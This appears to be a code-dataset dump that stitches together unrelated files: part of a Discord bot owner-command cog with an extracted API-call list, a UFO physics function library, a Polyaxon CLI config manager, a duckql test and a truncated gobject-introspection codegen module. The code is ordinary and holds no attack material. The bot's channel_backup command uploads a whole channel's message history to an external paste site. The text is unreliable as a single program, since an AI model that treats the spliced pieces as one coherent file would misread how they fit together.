Otherwise no thanks.") async def leave_guild(self, ctx, *, guild: typing.Optional[discord.Guild] = None): guild = guild or ctx.guild if guild is None: return await ctx.send("Guild is None can't do anything.") await ctx.send("Bot leaving guild :(") try: await guild.leave() except Exception as e: await ctx.send(f"Somehow an error occured: {e}") traceback.print_exc() @commands.command() async def aioinput_test(self, ctx, *, args = None): args = args or "Test" result=await self.bot.loop.run_in_executor(None, input, (f"{args}:")) await ctx.send(f"Result of the input was {result}") @commands.command(brief="a powerful owner tool to reload local files that aren't reloadable.") async def reload_basic(self, ctx, *, args = None): if args is None:await ctx.send("Can't reload module named None") if args: try: module = importlib.import_module(name=args) except Exception as e: traceback.print_exc() return await ctx.send(e) try: value=importlib.reload(module) except Exception as e: traceback.print_exc() return await ctx.send(e) await ctx.send(f"Sucessfully reloaded {value.__name__} \nMain Package: {value.__package__}") @commands.command(brief="backs up a channel and then sends it into a file or mystbin") async def channel_backup(self, ctx): messages = await ctx.channel.history(limit = None, oldest_first = True).flatten() new_line = "\n" page = "\n".join(f"{msg.author} ({('Bot' if msg.author.bot else 'User')}) : {msg.content} {new_line}Attachments : {msg.attachments}" if msg.content else f"{msg.author} ({('Bot' if msg.author.bot else 'User')}) : {new_line.join(f'{e.to_dict()}' for e in msg.embeds)} {new_line}Attachments : {msg.attachments}" for msg in messages) mystbin_client = mystbin.Client(session = self.bot.session) paste = await mystbin_client.post(page) await ctx.author.send(content=f"Added text file to mystbin: \n{paste.url}") @channel_backup.error async def channel_backup_error(self, ctx, error): etype = type(error) trace = error.__traceback__ values=''.join(map(str,traceback.format_exception(etype, error, trace))) pages = textwrap.wrap(values, width = 1992) menu = ViewMenuPages(utils.ErrorEmbed(pages, per_page = 1),delete_message_after = True) if (ctx.author.dm_channel is None): await ctx.author.create_dm() await menu.start(ctx, channel = ctx.author.dm_channel) mystbin_client = mystbin.Client(session=self.bot.session) paste = await mystbin_client.post(values) await ctx.send(f"Traceback: {paste.url}") @commands.command(brief = "adds packages and urls to rtfm DB", aliases=["add_rtfm"]) async def addrtfm(self, ctx, name = None, *, url = None): if not name or not url or not name and not url: return await ctx.send("You need a name and also url.") cur = await self.bot.sus_users.cursor() await cur.execute("INSERT INTO RTFM_DICTIONARY VALUES (?, ?)", (name, url)) await self.bot.sus_users.commit() await cur.close() await ctx.send(f"added {name} and {url} to the rtfm DB") @commands.command(brief = "removes packages from the rtfm DB", aliases = ["remove_rtfm"]) async def removertfm(self, ctx, *, name = None): if name is None: return await ctx.send("You can't remove None") cur = await self.bot.sus_users.cursor() await cur.execute("DELETE FROM RTFM_DICTIONARY WHERE name = ?", (name,)) await self.bot.sus_users.commit() await cur.close() await ctx.send(f"Removed the rfm value {name}.") @commands.command(brief = "a command to save images to imgur(for owner only lol)") async def save_image(self, ctx): if not ctx.message.attachments: return await ctx.send("You need to provide some attachments.") await 
ctx.send("JDJG doesn't take any responbility for what you upload here :eyes: don't upload anything bad okay?") for x in ctx.message.attachments: try: discord.utils._get_mime_type_for_image(await x.read()) except Exception as e: traceback.print_exc() return await ctx.send(e) imgur_client= aioimgur.ImgurClient(os.environ["imgur_id"], os.environ["imgur_secret"]) imgur_url = await imgur_client.upload(await x.read()) await ctx.send(f"{imgur_url['link']}") @commands.command(brief="A command to remove testers") async def remove_tester(self, ctx, *, user: utils.BetterUserconverter = None): if user is None: await ctx.send("You can't have a non existent user.") if user: cur = await self.bot.sus_users.cursor() await cur.execute("DELETE FROM testers_list WHERE user_id = ?", (user.id,)) await self.bot.sus_users.commit() await cur.close() if not user.id in self.bot.testers: return await ctx.send(f"{user} isn't in the testers list.") else: self.bot.testers.remove(user.id) await ctx.send(f"Removed tester known as {user}") @commands.command(brief="A command to add testers") async def add_tester(self, ctx, *, user: utils.BetterUserconverter = None): if user is None: await ctx.send("You can't have a non existent user.") if user: cur = await self.bot.sus_users.cursor() await cur.execute("INSERT INTO testers_list VALUES (?)", (user.id,)) await self.bot.sus_users.commit() await cur.close() if not user.id in self.bot.testers: self.bot.testers.append(user.id) await ctx.send(f"added tester known as {user}") else: return await ctx.send(f"{user} is in the testers list already!") def tweepy_post(self, post_text = None): consumer_key = os.getenv('tweet_key') consumer_secret = os.getenv('tweet_secret') auth = tweepy.OAuthHandler(consumer_key, consumer_secret) access_token = os.getenv('tweet_access') access_secret = os.getenv('tweet_token') auth.set_access_token(access_token, access_secret) twitter_api = tweepy.API(auth) return twitter_api.update_status(status = post_text) @commands.command(brief = "sends tweet to JDBot Twitter") async def send_tweet(self, ctx, *, args = None): if not args: return await ctx.send("you can't send nothing to twitter.") try: tweet_time = functools.partial(self.tweepy_post, args) post = await self.bot.loop.run_in_executor(None, tweet_time) except Exception as e: traceback.print_exc() return await ctx.send(f"Exception occured at {e}") await ctx.send(f"Url of sent tweet is: https://twitter.com/twitter/statuses/{post.id}") @commands.command(brief = "chunks a guild for the purpose of testing purpose(it's owner only to be used in testing guilds only)") async def chunk_guild(self, ctx): if ctx.guild is None: return await ctx.send("You can't chunk a guild that doesn't exist or a channel that is a DM.") if ctx.guild.chunked: return await ctx.send("No need to chunk this guild, it appears to be chunked") await ctx.guild.chunk(cache = True) await ctx.send("Finished chunking..") @chunk_guild.error async def chunk_guild_error(self, ctx, error): await ctx.send(error) traceback.print_exc() @commands.command(brief = "displays the guild status and user status immediately") async def stats_status(self, ctx): await ctx.send("changing status, check now....") await self.bot.change_presence(status=discord.Status.online, activity=discord.Activity(type=discord.ActivityType.watching, name=f"{len(self.bot.guilds)} servers | {len(self.bot.users)} users")) @stats_status.error async def stats_status_error(self, ctx, error): await ctx.send(error) @commands.command(brief="a command to give a list of servers(owner 
only)",help="Gives a list of guilds(Bot Owners only) but with join dates updated.") async def servers2(self, ctx): if await self.bot.is_owner(ctx.author): sorted_guilds = sorted(self.bot.guilds, key=lambda guild: guild.me.joined_at) pag = commands.Paginator() for g in sorted_guilds: pag.add_line(f"{discord.utils.format_dt(g.me.joined_at, style = 'd')} {discord.utils.format_dt(g.me.joined_at, style = 'T')} \n[{len(g.members)}/{g.member_count}] **{g.name}** (`{g.id}`) | {(g.system_channel or g.text_channels[0]).mention}\n") pages = [page.strip("`") for page in pag.pages] menu = ViewMenuPages(self.ServersEmbed(pages, per_page=1),delete_message_after=True) if (ctx.author.dm_channel is None): await ctx.author.create_dm() await menu.start(ctx, channel = ctx.author.dm_channel) if await self.bot.is_owner(ctx.author) is False: await ctx.send("You can't use that it's owner only") def setup(bot): bot.add_cog(Owner(bot))
[((293, 341), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""a command to send mail"""'}), "(brief='a command to send mail')\n", (309, 341), False, 'from discord.ext import commands, menus\n'), ((1418, 1436), 'discord.ext.commands.command', 'commands.command', ([], {}), '()\n', (1434, 1436), False, 'from discord.ext import commands, menus\n'), ((1771, 1789), 'discord.ext.commands.command', 'commands.command', ([], {}), '()\n', (1787, 1789), False, 'from discord.ext import commands, menus\n'), ((2401, 2419), 'discord.ext.commands.command', 'commands.command', ([], {}), '()\n', (2417, 2419), False, 'from discord.ext import commands, menus\n'), ((2793, 2811), 'discord.ext.commands.command', 'commands.command', ([], {}), '()\n', (2809, 2811), False, 'from discord.ext import commands, menus\n'), ((3226, 3282), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""Changes Bot Status(Owner Only)"""'}), "(brief='Changes Bot Status(Owner Only)')\n", (3242, 3282), False, 'from discord.ext import commands, menus\n'), ((3753, 3822), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""Only owner command to change bot\'s nickname"""'}), '(brief="Only owner command to change bot\'s nickname")\n', (3769, 3822), False, 'from discord.ext import commands, menus\n'), ((4596, 4721), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""a command to give a list of servers(owner only)"""', 'help': '"""Gives a list of guilds(Bot Owners only)"""'}), "(brief='a command to give a list of servers(owner only)',\n help='Gives a list of guilds(Bot Owners only)')\n", (4612, 4721), False, 'from discord.ext import commands, menus\n'), ((5407, 5520), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""only works with JDJG, but this command is meant to send updates to my webhook"""'}), "(brief=\n 'only works with JDJG, but this command is meant to send updates to my webhook'\n )\n", (5423, 5520), False, 'from discord.ext import commands, menus\n'), ((6895, 6964), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""Commands to see what guilds a person is in."""'}), "(brief='Commands to see what guilds a person is in.')\n", (6911, 6964), False, 'from discord.ext import commands, menus\n'), ((7503, 7569), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""A command to add sus_users with a reason"""'}), "(brief='A command to add sus_users with a reason')\n", (7519, 7569), False, 'from discord.ext import commands, menus\n'), ((8115, 8171), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""a command to remove sus users."""'}), "(brief='a command to remove sus users.')\n", (8131, 8171), False, 'from discord.ext import commands, menus\n'), ((8906, 8975), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""a command to grab all in the sus_users list"""'}), "(brief='a command to grab all in the sus_users list')\n", (8922, 8975), False, 'from discord.ext import commands, menus\n'), ((9723, 9782), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""a command listed all the commands"""'}), "(brief='a command listed all the commands')\n", (9739, 9782), False, 'from discord.ext import commands, menus\n'), ((9953, 9971), 'discord.ext.commands.command', 'commands.command', ([], {}), '()\n', (9969, 9971), False, 'from discord.ext import commands, menus\n'), ((10184, 10228), 'discord.ext.commands.command', 'commands.command', ([], {'aliases': 
"['bypass_command']"}), "(aliases=['bypass_command'])\n", (10200, 10228), False, 'from discord.ext import commands, menus\n'), ((10833, 10911), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""resets cooldown for you."""', 'aliases': "['reset_cooldown']"}), "(brief='resets cooldown for you.', aliases=['reset_cooldown'])\n", (10849, 10911), False, 'from discord.ext import commands, menus\n'), ((11421, 11531), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""leaves a guild only use when needed or really wanted. Otherwise no thanks."""'}), "(brief=\n 'leaves a guild only use when needed or really wanted. Otherwise no thanks.'\n )\n", (11437, 11531), False, 'from discord.ext import commands, menus\n'), ((11918, 11936), 'discord.ext.commands.command', 'commands.command', ([], {}), '()\n', (11934, 11936), False, 'from discord.ext import commands, menus\n'), ((12152, 12250), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""a powerful owner tool to reload local files that aren\'t reloadable."""'}), '(brief=\n "a powerful owner tool to reload local files that aren\'t reloadable.")\n', (12168, 12250), False, 'from discord.ext import commands, menus\n'), ((12770, 12860), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""backs up a channel and then sends it into a file or mystbin"""'}), "(brief=\n 'backs up a channel and then sends it into a file or mystbin')\n", (12786, 12860), False, 'from discord.ext import commands, menus\n'), ((14182, 14268), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""adds packages and urls to rtfm DB"""', 'aliases': "['add_rtfm']"}), "(brief='adds packages and urls to rtfm DB', aliases=[\n 'add_rtfm'])\n", (14198, 14268), False, 'from discord.ext import commands, menus\n'), ((14690, 14779), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""removes packages from the rtfm DB"""', 'aliases': "['remove_rtfm']"}), "(brief='removes packages from the rtfm DB', aliases=[\n 'remove_rtfm'])\n", (14706, 14779), False, 'from discord.ext import commands, menus\n'), ((15143, 15222), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""a command to save images to imgur(for owner only lol)"""'}), "(brief='a command to save images to imgur(for owner only lol)')\n", (15159, 15222), False, 'from discord.ext import commands, menus\n'), ((15904, 15957), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""A command to remove testers"""'}), "(brief='A command to remove testers')\n", (15920, 15957), False, 'from discord.ext import commands, menus\n'), ((16560, 16610), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""A command to add testers"""'}), "(brief='A command to add testers')\n", (16576, 16610), False, 'from discord.ext import commands, menus\n'), ((17645, 17699), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""sends tweet to JDBot Twitter"""'}), "(brief='sends tweet to JDBot Twitter')\n", (17661, 17699), False, 'from discord.ext import commands, menus\n'), ((18195, 18331), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""chunks a guild for the purpose of testing purpose(it\'s owner only to be used in testing guilds only)"""'}), '(brief=\n "chunks a guild for the purpose of testing purpose(it\'s owner only to be used in testing guilds only)"\n )\n', (18211, 18331), False, 'from discord.ext import commands, menus\n'), ((18813, 18892), 
'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""displays the guild status and user status immediately"""'}), "(brief='displays the guild status and user status immediately')\n", (18829, 18892), False, 'from discord.ext import commands, menus\n'), ((19293, 19452), 'discord.ext.commands.command', 'commands.command', ([], {'brief': '"""a command to give a list of servers(owner only)"""', 'help': '"""Gives a list of guilds(Bot Owners only) but with join dates updated."""'}), "(brief='a command to give a list of servers(owner only)',\n help='Gives a list of guilds(Bot Owners only) but with join dates updated.'\n )\n", (19309, 19452), False, 'from discord.ext import commands, menus\n'), ((7085, 7105), 'discord.ext.commands.Paginator', 'commands.Paginator', ([], {}), '()\n', (7103, 7105), False, 'from discord.ext import commands, menus\n'), ((13364, 13404), 'mystbin.Client', 'mystbin.Client', ([], {'session': 'self.bot.session'}), '(session=self.bot.session)\n', (13378, 13404), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n'), ((13757, 13790), 'textwrap.wrap', 'textwrap.wrap', (['values'], {'width': '(1992)'}), '(values, width=1992)\n', (13770, 13790), False, 'import traceback, textwrap\n'), ((14044, 14084), 'mystbin.Client', 'mystbin.Client', ([], {'session': 'self.bot.session'}), '(session=self.bot.session)\n', (14058, 14084), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n'), ((17266, 17288), 'os.getenv', 'os.getenv', (['"""tweet_key"""'], {}), "('tweet_key')\n", (17275, 17288), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n'), ((17311, 17336), 'os.getenv', 'os.getenv', (['"""tweet_secret"""'], {}), "('tweet_secret')\n", (17320, 17336), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n'), ((17349, 17399), 'tweepy.OAuthHandler', 'tweepy.OAuthHandler', (['consumer_key', 'consumer_secret'], {}), '(consumer_key, consumer_secret)\n', (17368, 17399), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n'), ((17420, 17445), 'os.getenv', 'os.getenv', (['"""tweet_access"""'], {}), "('tweet_access')\n", (17429, 17445), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n'), ((17466, 17490), 'os.getenv', 'os.getenv', (['"""tweet_token"""'], {}), "('tweet_token')\n", (17475, 17490), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n'), ((17566, 17582), 'tweepy.API', 'tweepy.API', (['auth'], {}), '(auth)\n', (17576, 17582), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n'), ((18784, 18805), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (18803, 18805), False, 'import traceback, textwrap\n'), ((3158, 3179), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (3177, 3179), False, 'import traceback, textwrap\n'), ((4806, 4826), 'discord.ext.commands.Paginator', 'commands.Paginator', ([], {}), '()\n', (4824, 4826), False, 'from discord.ext import commands, menus\n'), ((7289, 7331), 'utils.mutualGuildsEmbed', 'utils.mutualGuildsEmbed', (['pages'], {'per_page': '(1)'}), '(pages, per_page=1)\n', (7312, 7331), False, 'import utils\n'), ((13819, 13854), 'utils.ErrorEmbed', 'utils.ErrorEmbed', (['pages'], {'per_page': '(1)'}), '(pages, per_page=1)\n', (13835, 13854), False, 'import utils\n'), ((15721, 15793), 
'aioimgur.ImgurClient', 'aioimgur.ImgurClient', (["os.environ['imgur_id']", "os.environ['imgur_secret']"], {}), "(os.environ['imgur_id'], os.environ['imgur_secret'])\n", (15741, 15793), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n'), ((17870, 17911), 'functools.partial', 'functools.partial', (['self.tweepy_post', 'args'], {}), '(self.tweepy_post, args)\n', (17887, 17911), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n'), ((19618, 19638), 'discord.ext.commands.Paginator', 'commands.Paginator', ([], {}), '()\n', (19636, 19638), False, 'from discord.ext import commands, menus\n'), ((5879, 5953), 'discord.Webhook.from_url', 'discord.Webhook.from_url', (["os.environ['webhook1']"], {'session': 'self.bot.session'}), "(os.environ['webhook1'], session=self.bot.session)\n", (5903, 5953), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n'), ((5970, 6046), 'discord.Embed', 'discord.Embed', ([], {'title': '"""Update"""', 'color': '(35056)', 'timestamp': 'ctx.message.created_at'}), "(title='Update', color=35056, timestamp=ctx.message.created_at)\n", (5983, 6046), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n'), ((6306, 6381), 'discord.Webhook.from_url', 'discord.Webhook.from_url', (["os.environ['webhook99']"], {'session': 'self.bot.session'}), "(os.environ['webhook99'], session=self.bot.session)\n", (6330, 6381), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n'), ((6398, 6474), 'discord.Embed', 'discord.Embed', ([], {'title': '"""Update"""', 'color': '(35056)', 'timestamp': 'ctx.message.created_at'}), "(title='Update', color=35056, timestamp=ctx.message.created_at)\n", (6411, 6474), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n'), ((11890, 11911), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (11909, 11911), False, 'import traceback, textwrap\n'), ((12402, 12436), 'importlib.import_module', 'importlib.import_module', ([], {'name': 'args'}), '(name=args)\n', (12425, 12436), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n'), ((12547, 12571), 'importlib.reload', 'importlib.reload', (['module'], {}), '(module)\n', (12563, 12571), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n'), ((13693, 13740), 'traceback.format_exception', 'traceback.format_exception', (['etype', 'error', 'trace'], {}), '(etype, error, trace)\n', (13719, 13740), False, 'import traceback, textwrap\n'), ((18019, 18040), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (18038, 18040), False, 'import traceback, textwrap\n'), ((761, 788), 'random.randint', 'random.randint', (['(0)', '(16777215)'], {}), '(0, 16777215)\n', (775, 788), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n'), ((1604, 1625), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (1623, 1625), False, 'import traceback, textwrap\n'), ((2309, 2330), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (2328, 2330), False, 'import traceback, textwrap\n'), ((2612, 2633), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (2631, 2633), False, 'import traceback, textwrap\n'), ((4542, 4569), 'random.randint', 'random.randint', (['(0)', '(16777215)'], {}), '(0, 16777215)\n', (4556, 4569), False, 
'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n'), ((8750, 8777), 'random.randint', 'random.randint', (['(0)', '(16777215)'], {}), '(0, 16777215)\n', (8764, 8777), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n'), ((9588, 9615), 'random.randint', 'random.randint', (['(0)', '(16777215)'], {}), '(0, 16777215)\n', (9602, 9615), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n'), ((12474, 12495), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (12493, 12495), False, 'import traceback, textwrap\n'), ((12610, 12631), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (12629, 12631), False, 'import traceback, textwrap\n'), ((15638, 15659), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (15657, 15659), False, 'import traceback, textwrap\n'), ((646, 662), 'utils.check', 'utils.check', (['ctx'], {}), '(ctx)\n', (657, 662), False, 'import utils\n'), ((2070, 2091), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (2089, 2091), False, 'import traceback, textwrap\n'), ((7840, 7856), 'utils.check', 'utils.check', (['ctx'], {}), '(ctx)\n', (7851, 7856), False, 'import utils\n'), ((3477, 3540), 'discord.Activity', 'discord.Activity', ([], {'type': 'discord.ActivityType.watching', 'name': 'args'}), '(type=discord.ActivityType.watching, name=args)\n', (3493, 3540), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n'), ((19692, 19742), 'discord.utils.format_dt', 'discord.utils.format_dt', (['g.me.joined_at'], {'style': '"""d"""'}), "(g.me.joined_at, style='d')\n", (19715, 19742), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n'), ((19747, 19797), 'discord.utils.format_dt', 'discord.utils.format_dt', (['g.me.joined_at'], {'style': '"""T"""'}), "(g.me.joined_at, style='T')\n", (19770, 19797), False, 'import random, discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy\n')]
valassi/mg5amc_test
tests/input_files/full_sm_UFO/function_library.py
2e04f23353051f64e1604b23105fe3faabd32869
# This file is part of the UFO. # # This file contains definitions for functions that # are extensions of the cmath library, and correspond # either to functions that are in cmath, but inconvenient # to access from there (e.g. z.conjugate()), # or functions that are simply not defined. # # from __future__ import absolute_import __date__ = "22 July 2010" __author__ = "[email protected]" import cmath from .object_library import all_functions, Function # # shortcuts for functions from cmath # complexconjugate = Function(name = 'complexconjugate', arguments = ('z',), expression = 'z.conjugate()') re = Function(name = 're', arguments = ('z',), expression = 'z.real') im = Function(name = 'im', arguments = ('z',), expression = 'z.imag') # New functions (trigonometric) sec = Function(name = 'sec', arguments = ('z',), expression = '1./cmath.cos(z)') asec = Function(name = 'asec', arguments = ('z',), expression = 'cmath.acos(1./z)') csc = Function(name = 'csc', arguments = ('z',), expression = '1./cmath.sin(z)') acsc = Function(name = 'acsc', arguments = ('z',), expression = 'cmath.asin(1./z)')
[]
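As an illustration (not part of the repository file above): each Function stores its math as a plain Python expression string over cmath. A minimal sketch of what such a string evaluates to, using the 'sec' expression verbatim; how the UFO machinery actually consumes these strings is outside this file.

import cmath

# Expression copied verbatim from the 'sec' Function above; evaluating it
# against cmath reproduces 1/cos(z) for a complex argument.
z = 0.5 + 0.2j
sec_expression = '1./cmath.cos(z)'
assert eval(sec_expression) == 1. / cmath.cos(z)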
hackerwins/polyaxon
cli/polyaxon/managers/cli.py
ff56a098283ca872abfbaae6ba8abba479ffa394
#!/usr/bin/python # # Copyright 2019 Polyaxon, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # coding: utf-8 from __future__ import absolute_import, division, print_function from distutils.version import LooseVersion # pylint:disable=import-error from polyaxon.managers.base import BaseConfigManager from polyaxon.schemas.cli.cli_configuration import CliConfigurationConfig class CliConfigManager(BaseConfigManager): """Manages access cli configuration .polyaxoncli file.""" IS_GLOBAL = True CONFIG_FILE_NAME = ".polyaxoncli" CONFIG = CliConfigurationConfig FREQUENCY = 3 @classmethod def _get_count(cls): config = cls.get_config_or_default() return config.check_count + 1 @classmethod def reset( cls, check_count=None, current_version=None, server_versions=None, log_handler=None, ): if not any([check_count, current_version, server_versions, log_handler]): return cli_config = cls.get_config_or_default() if check_count is not None: cli_config.check_count = check_count if current_version is not None: cli_config.current_version = current_version if server_versions is not None: cli_config.server_versions = server_versions if log_handler is not None: cli_config.log_handler = log_handler CliConfigManager.set_config(config=cli_config) return cli_config @classmethod def should_check(cls): count = cls._get_count() cls.reset(check_count=count) if count > cls.FREQUENCY: return True config = cls.get_config_or_default() if config.current_version is None or config.min_version is None: return True return LooseVersion(config.current_version) < LooseVersion(config.min_version)
[((2323, 2359), 'distutils.version.LooseVersion', 'LooseVersion', (['config.current_version'], {}), '(config.current_version)\n', (2335, 2359), False, 'from distutils.version import LooseVersion\n'), ((2362, 2394), 'distutils.version.LooseVersion', 'LooseVersion', (['config.min_version'], {}), '(config.min_version)\n', (2374, 2394), False, 'from distutils.version import LooseVersion\n')]
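As an illustration (not part of the repository file above): should_check() falls back to comparing versions with distutils' LooseVersion, so the upgrade check fires when the installed CLI version is older than the server-side minimum. A quick sketch of that ordering:

from distutils.version import LooseVersion

# Numeric components are compared piecewise, so "0.10" sorts after "0.5".
print(LooseVersion("0.5.1") < LooseVersion("0.10.0"))   # True  -> a check is due
print(LooseVersion("1.2.0") < LooseVersion("1.2.0"))    # False -> already up to date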
fossabot/duckql-python
duckql/properties/tests/test_null.py
b4aead825ee456d9758db89830c7bca9d5d5106e
import pytest from duckql.properties import Null @pytest.fixture(scope="module") def valid_instance() -> Null: return Null() def test_string(valid_instance: Null): assert str(valid_instance) == 'NULL' def test_obj(valid_instance: Null): assert valid_instance.obj == 'properties.Null' def test_json_parse(valid_instance: Null): assert valid_instance.json() == '{"obj": "properties.Null"}'
[((53, 83), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""module"""'}), "(scope='module')\n", (67, 83), False, 'import pytest\n'), ((125, 131), 'duckql.properties.Null', 'Null', ([], {}), '()\n', (129, 131), False, 'from duckql.properties import Null\n')]
sotaoverride/backup
openbmc/build/tmp/deploy/sdk/witherspoon-2019-08-08/sysroots/armv6-openbmc-linux-gnueabi/usr/lib/gobject-introspection/giscanner/codegen.py
ca53a10b72295387ef4948a9289cb78ab70bc449
# -*- Mode: Python -*- # GObject-Introspection - a framework for introspecting GObject libraries # Copyright (C) 2010 Red Hat, Inc. # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2 of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the # Free Software Foundation, Inc., 59 Temple Place - Suite 330, # Boston, MA 02111-1307, USA. # import os from contextlib import contextmanager from . import ast class CCodeGenerator(object): def __init__(self, namespace, out_h_filename, out_c_filename, function_decoration=[], include_first_header=[], include_last_header=[], include_first_src=[], include_last_src=[]): self.out_h_filename = out_h_filename self.out_c_filename = out_c_filename self.function_decoration = function_decoration self.include_first_header = include_first_header self.include_last_header = include_last_header self.include_first_src = include_first_src self.include_last_src = include_last_src self._function_bodies = {} self.namespace = namespace def gen_symbol(self, name): name = name.replace(' ', '_') return '%s_%s' % (self.namespace.symbol_prefixes[0], name) def _typecontainer_to_ctype(self, param): if (isinstance(param, ast.Parameter) and param.direction in (ast.PARAM_DIRECTION_OUT, ast.PARAM_DIRECTION_INOUT)): suffix = '*' else: suffix = '' if (param.type.is_equiv((ast.TYPE_STRING, ast.TYPE_FILENAME)) and param.transfer == ast.PARAM_TRANSFER_NONE): return "const gchar*" + suffix return param.type.ctype + suffix def _write_prelude(self, out, func): if self.function_decoration: out.write(""" %s""" % " ".join(self.function_decoration)) out.write(""" %s %s (""" % (self._typecontainer_to_ctype(func.retval), func.symbol)) l = len(func.parameters) if func.parameters: for i, param in enumerate(func.parameters): ctype = self._typecontainer_to_ctype(param) out.write('%s %s' % (ctype, param.argname)) if i < l - 1: out.write(", ") else: out.write('void') out.write(")") def _write_prototype(self, func): self._write_prelude(self.out_h, func) self.out_h.write(";\n\n") def _write_annotation_transfer(self, node): if (node.type not in ast.BASIC_TYPES or node.type.ctype.endswith('*')): self.out_c.write(" (transfer %s)" % (node.transfer, )) def _write_docs(self, func): self.out_c.write("/**\n * %s:\n" % (func.symbol, )) for param in func.parameters: self.out_c.write(" * @%s" % (param.argname, )) if param.direction in (ast.PARAM_DIRECTION_OUT, ast.PARAM_DIRECTION_INOUT): if param.caller_allocates: allocate_string = ' caller-allocates' else: allocate_string = '' self.out_c.write(": (%s%s) " % (param.direction, allocate_string)) self._write_annotation_transfer(param) self.out_c.write(":\n") self.out_c.write(' *\n') self.out_c.write(' * Undocumented.') if func.retval.type != ast.TYPE_NONE: self.out_c.write('\n *\n') self.out_c.write(' * Returns: ') self._write_annotation_transfer(func.retval) self.out_c.write('\n */') @contextmanager def _function(self, func): self._write_prototype(func) self._write_docs(func) self._write_prelude(self.out_c, func) self.out_c.write("\n{\n") yield 
self.out_c.write("}\n\n") def _codegen_start(self): warning = '/* GENERATED BY testcodegen.py; DO NOT EDIT */\n\n' self.out_h.write(warning) nsupper = self.namespace.name.upper() for header in self.include_first_header: self.out_h.write("""#include "%s"\n""" % header) self.out_h.write(""" #ifndef __%s_H__ #define __%s_H__ #include <glib-object.h> """ % (nsupper, nsupper)) for header in self.include_last_header: self.out_h.write("""#include "%s"\n""" % header) self.out_c.write(warning) for header in self.include_first_src: self.out_c.write("""#include "%s"\n""" % header) src_dir = os.path.dirname(os.path.realpath(self.out_c.name)) header = os.path.relpath(self.out_h_filename, src_dir) self.out_c.write("""#include "%s"\n\n""" % (header, )) for header in self.include_last_src: self.out_c.write("""#include "%s"\n""" % header) def _codegen_end(self): self.out_h.write("""#endif\n""") self.out_h.close() self.out_c.close() def set_function_body(self, node, body): assert isinstance(node, ast.Function) self._function_bodies[node] = body def codegen(self): self.out_h = open(self.out_h_filename, 'w') self.out_c = open(self.out_c_filename, 'w') self._codegen_start() for node in self.namespace.values(): if 